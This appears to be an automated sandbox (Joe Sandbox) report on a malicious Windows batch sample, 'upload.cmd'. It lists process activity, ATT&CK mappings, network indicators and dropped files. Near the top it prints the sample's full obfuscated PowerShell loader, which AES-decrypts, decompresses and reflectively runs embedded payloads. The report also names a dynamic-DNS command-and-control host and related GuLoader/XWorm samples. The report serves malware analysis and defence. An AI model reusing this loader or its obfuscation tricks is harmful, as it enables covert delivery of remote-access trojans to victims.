      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rzmoooy2kqgkiwy4rorfj6iiwcpdkf2hw9dvyzhqs4e='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('au8minhry/rn0xwxzshhqq=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $gkmlj=new-object system.io.memorystream(,$param_var); $cuzzm=new-object system.io.memorystream; $xkhtn=new-object system.io.compression.gzipstream($gkmlj, [io.compression.compressionmode]::decompress); $xkhtn.copyto($cuzzm); $xkhtn.dispose(); $gkmlj.dispose(); $cuzzm.dispose(); $cuzzm.toarray();}function execute_function($param_var,$param2_var){ $dumer=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $qdtaj=$dumer.entrypoint; $qdtaj.invoke($null, $param2_var);}$eqnwc = 'c:\users\user\desktop\upload.cmd';$host.ui.rawui.windowtitle = $eqnwc;$jwnva=[system.io.file]::('txetlladaer'[-1..-11] -join '')($eqnwc).split([environment]::newline);foreach ($ghmic in $jwnva) { if ($ghmic.startswith('oydvwzhhegvkfmqgimzx')) { $pfglm=$ghmic.substring(20); break; }}$payloads_var=[string[]]$pfglm.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote ServicesData from Local System1
      Non-Standard Port      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts11
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive11
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets12
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446790 Sample: upload.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 84 25 xgmn934.duckdns.org 2->25 29 Snort IDS alert for network traffic 2->29 31 Yara detected Powershell decode and execute 2->31 33 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->33 37 2 other signatures 2->37 8 cmd.exe 1 2->8         started        signatures3 35 Uses dynamic DNS services 25->35 process4 signatures5 39 Suspicious powershell command line found 8->39 41 Obfuscated command line found 8->41 43 Bypasses PowerShell execution policy 8->43 11 powershell.exe 28 8->11         started        15 conhost.exe 8->15         started        17 cmd.exe 1 8->17         started        19 cmd.exe 1 8->19         started        process6 dnsIp7 27 xgmn934.duckdns.org 12.202.180.134, 49705, 8896 FISERV-INCUS United States 11->27 23 \Device\ConDrv, ASCII 11->23 dropped 21 wermgr.exe 14 11->21         started        file8 process9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      upload.cmd3%ReversingLabs

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://upx.sf.net0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      xgmn934.duckdns.org
      		12.202.180.134
      		truetrue
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://upx.sf.netAmcache.hve.5.drfalse
        • URL Reputation: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        12.202.180.134
        		xgmn934.duckdns.orgUnited States
        		22983FISERV-INCUStrue

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446790
        Start date and time:2024-05-23 21:12:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 42s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:upload.cmd
        Detection:MAL
        Classification:mal84.troj.evad.winCMD@9/9@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .cmd
        • Override analysis time to 240s for powershell

        Warnings

        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.189.173.20
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: upload.cmd

        Simulations

        Behavior and APIs

        TimeTypeDescription
        15:12:59API Interceptor6714071x Sleep call for process: powershell.exe modified
        15:16:10API Interceptor1x Sleep call for process: wermgr.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        12.202.180.134xff.cmdGet hashmaliciousGuLoader, XWormBrowse
          zap.cmdGet hashmaliciousUnknownBrowse
            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
              update.cmdGet hashmaliciousUnknownBrowse
                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                  new.cmdGet hashmaliciousGuLoaderBrowse
                    las.cmdGet hashmaliciousGuLoaderBrowse
                      kam.cmdGet hashmaliciousUnknownBrowse
                        sample.cmdGet hashmaliciousUnknownBrowse
                          zap.cmdGet hashmaliciousGuLoader, XWormBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            xgmn934.duckdns.orgzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                            • 12.202.180.134
                            new.cmdGet hashmaliciousGuLoaderBrowse
                            • 12.202.180.134
                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                            • 12.202.180.134
                            update.vbsGet hashmaliciousGuLoader, XWormBrowse
                            • 12.202.180.134

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            FISERV-INCUSxff.cmdGet hashmaliciousGuLoader, XWormBrowse
                            • 12.202.180.134
                            zap.cmdGet hashmaliciousUnknownBrowse
                            • 12.202.180.134
                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                            • 12.202.180.134
                            update.cmdGet hashmaliciousUnknownBrowse
                            • 12.202.180.134
                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                            • 12.202.180.134
                            new.cmdGet hashmaliciousGuLoaderBrowse
                            • 12.202.180.134
                            las.cmdGet hashmaliciousGuLoaderBrowse
                            • 12.202.180.134
                            kam.cmdGet hashmaliciousUnknownBrowse
                            • 12.202.180.134
                            sample.cmdGet hashmaliciousUnknownBrowse
                            • 12.202.180.134
                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                            • 12.202.180.134

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a877394161d3cf447332d615808566972940da62_00000000_d1cd7007-caff-4981-855f-0a14e44e516f\Report.wer

                            Download File
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.5190904443757718
                            Encrypted:false
                            SSDEEP:96:+NuFnALjdhxrxYid0RH3Uje0eu/RoJV1QXIGZAX/d5FMT2SlPkpXmTAUf/VXT5Nr:rwzxmG0R30h/AzuiFyZ24lO8
                            MD5:3794947807DA48B2A3EB91A6F8937139
                            SHA1:2D02D90CB72B98AC766563410E84AE63DC92D186
                            SHA-256:F1A5C0836A72EB0B75CE0D7B749D2AD5E47DEC3CF56BCD05466D9964F72DE55D
                            SHA-512:26EA2A8160A6F66D57CED41617560E998FDDF394C658B31EB1DF5654974285BC7432D6C61E646520CBABA15283A9C8D93AE2C9C51614B3998C64BD6A9AD98443
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.4.3.0.5.2.2.5.3.6.6.9.1.0.7.4.8.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.5.3.6.3.7.4.8.7.6.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.c.d.7.0.0.7.-.c.a.f.f.-.4.9.8.1.-.8.5.5.f.-.0.a.1.4.e.4.4.e.5.1.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.c.-.0.0.0.1.-.0.0.1.4.-.e.6.8.5.-.a.7.3.8.4.5.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCDF.tmp.WERInternalMetadata.xml

                            Download File
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):7200
                            Entropy (8bit):3.684418552616875
                            Encrypted:false
                            SSDEEP:96:RSIU6o7wVetbk7QCDjyje6YQJvBggmfHNGfQiN5aMZAltm:R6l7wVeJk7dma6YQJ5ggmftW1pStm
                            MD5:1AD7BCDE9A76B61F2263BE3720BEFD06
                            SHA1:9C7D64F2A10A82B5D204A26E2F959B924789BB17
                            SHA-256:C3F048953744E4FC82B217635C4B5DB643A24631617712D7C7DEF66F4D058034
                            SHA-512:650687C133B68C0116D6EA8BA45EA7D0E483B787F9483949709233157D644F5F7A06454D7AE2079A9C9310D2553639DF7D58CA31237A3C5DF1DA19E96E6B294F
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.1.2.<./.P.i.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD3D.tmp.xml

                            Download File
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4691
                            Entropy (8bit):4.511006018222363
                            Encrypted:false
                            SSDEEP:96:uIjfYI7P27V0JFKlEFBfFqWTXFBfF4EmufNd:uIEYP27i4I+Emufj
                            MD5:53A83207A5AEAB629FBD315DF5003A10
                            SHA1:8FB07F25BA5C84118573D1FA770B93D234C14C61
                            SHA-256:6B39EB068247D43744BC725E6A542FADAA80630C479477E71D87633E865C630A
                            SHA-512:258687B373B87ECED6F8F1D9F7088F0D381DE2A63C2D4DB485CF0934C3050C359538087DCF17F3BC63AC78F87651FAD2D1FE1A5A24780BA8D3459B194B0BCFEA
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336138" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Reputation:low
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):3056
                            Entropy (8bit):5.465515946139154
                            Encrypted:false
                            SSDEEP:48:CAzsSU4y4RQmFoUeCamfm9qr9t5/78NKRwS4GxJZKaVEouYAgwd64rHLjtv5/G+v:CAzlHyIFKL2O9qrh7KKRwSJ5Eo9Adrxj
                            MD5:2E5BCE07104547FE87397C8EAA3BA817
                            SHA1:A2F2D555B3C08681427546C57E311E802A4F8025
                            SHA-256:9DF2A6BDD89423BBC9661A09C46FC35E8626F525E7DA41B9D1286AB75835931E
                            SHA-512:FBB8063CD45BA3009CBF170E6CF6DADA809D0D9E6849FE0BA2C93AE9E0692BEF5BB2A8605C8B41E595ACE541D02F3618332FB408461D51D1519C9CAE0BDC0155
                            Malicious:false
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yorx0ed.msz.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1c1yq3g.11p.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\appcompat\Programs\Amcache.hve

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.372872817980425
                            Encrypted:false
                            SSDEEP:6144:AFVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguN/iL:YV1qyWWI/glMM6kF7tq
                            MD5:F02B6AC66F526D494D0AB0A981157BC9
                            SHA1:5BB8554058457D199741242223EBFDA6D3DD47E8
                            SHA-256:733BC98A9DB6D2B474C66A679BE67462A3F92E7FE79F93E269F48EF9BFA75238
                            SHA-512:1D46E8A22A4C3595BB058771A4AEC22100A0DDAB57AC8DF10EEB981A5A7E448BC7711786AC5478B4C2221CC51D08ED4F9E8A5D43A09877CCD43BD686E3A50E5D
                            Malicious:false
                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.[.E..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            \Device\ConDrv

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (1906), with CRLF line terminators
                            Category:dropped
                            Size (bytes):1908
                            Entropy (8bit):5.630609418622479
                            Encrypted:false
                            SSDEEP:48:IJRm8RUYRxSKB8qqjBJzDpOXkH/k6kTjjbhO2v5rAmQQrPOLx1CH2c:QBN7PB6jBJVkACAmrWLxAWc
                            MD5:C0B018068BF97C44DCA24452E190CA0F
                            SHA1:A508AEEE1128EC62585A13C162DDCC1078BBABCB
                            SHA-256:D161E5BC242512B44F8545EF43F0513A2BE65B7E2E24D05B3522452E14C19751
                            SHA-512:D0A15BDBECDE8CBE2E5B942FFA068C3F2FD420615BA4CD438723EB9CF647571F756DAC1091858CC9AF85E16240E586F1F3649647C235CF8C488982888CC3175B
                            Malicious:true
                            Yara Hits:
